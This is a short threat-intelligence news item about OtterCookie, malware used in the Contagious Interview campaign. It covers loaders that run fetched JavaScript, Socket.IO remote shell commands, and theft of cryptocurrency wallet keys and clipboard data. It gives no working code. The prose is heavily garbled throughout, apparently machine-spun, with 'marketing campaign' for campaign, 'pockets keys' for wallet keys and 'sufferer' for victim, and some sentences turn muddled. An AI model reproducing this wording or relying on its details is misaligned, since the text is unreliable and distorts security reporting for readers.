Palo Alto Networks reported the Contagious Interview marketing campaign in November 2023, a financially motivated assault focusing on numerous organizations, not like typical nation-sponsored assaults.
Whereas primarily related to BeaverTail and InvisibleFerret malware, SOCs have just lately noticed OtterCookie deployed inside this marketing campaign.
OtterCookie displays distinct conduct from its predecessors, demonstrating the marketing campaign’s evolution and increasing menace panorama, which highlights the significance of steady monitoring and menace intelligence updates for organizations to successfully mitigate the dangers posed by Contagious Interview.
Contagious Interview assaults, which exploit vulnerabilities in software program improvement processes, are more and more originating from numerous sources.
Whereas Node.js initiatives and npm packages stay frequent assault vectors, attackers at the moment are focusing on functions constructed with Qt and Electron frameworks, which demonstrates lively experimentation by attackers to determine and exploit new vulnerabilities within the software program provide chain.
Earlier analysis documented loaders that fetch JSON information, extract a “cookie” property, and execute it as JavaScript code, as an identical sample the place loaders obtain JavaScript code straight, triggering a 500 HTTP standing code and executing the code inside the ensuing catch block.
This loader primarily delivers BeaverTail malware, although OtterCookie infections have been famous and in addition encountered situations of simultaneous OtterCookie and BeaverTail executions.
OtterCookie, a malware noticed in November 2024, makes use of Socket.IO for distant communication and might execute shell instructions (command) and steal gadget data (whour) upon receiving distant instructions through the socketServer perform.
Evaluation of the instructions despatched by way of the socketServer perform revealed that OtterCookie collects cryptocurrency pockets keys from doc, picture, and cryptocurrency-related information and sends them to a distant server by utilizing ls and cat instructions for setting reconnaissance.
The OtterCookie model that was launched in November has improved capabilities for stealing cryptocurrency keys compared to the model that was launched in September.
Whereas each variations can steal keys, November leverages distant shell instructions for this function, whereas September depends on common expression-based checks inside the `checkForSensitiveData` perform.
November introduces clipboard monitoring performance utilizing the `clipboardy` library to exfiltrate delicate information from the sufferer’s gadget to a distant location, a function absent within the September OtterCookie.
In keeping with NTT, contagious Interview, a menace actor group, has deployed a brand new malware variant known as OtterCookie, which targets and steals browser cookies, doubtlessly compromising consumer accounts.
The assault vector stays beneath investigation, however the menace actor is actively evolving its techniques, as researchers have noticed assaults in Japan, indicating a broadening geographical scope.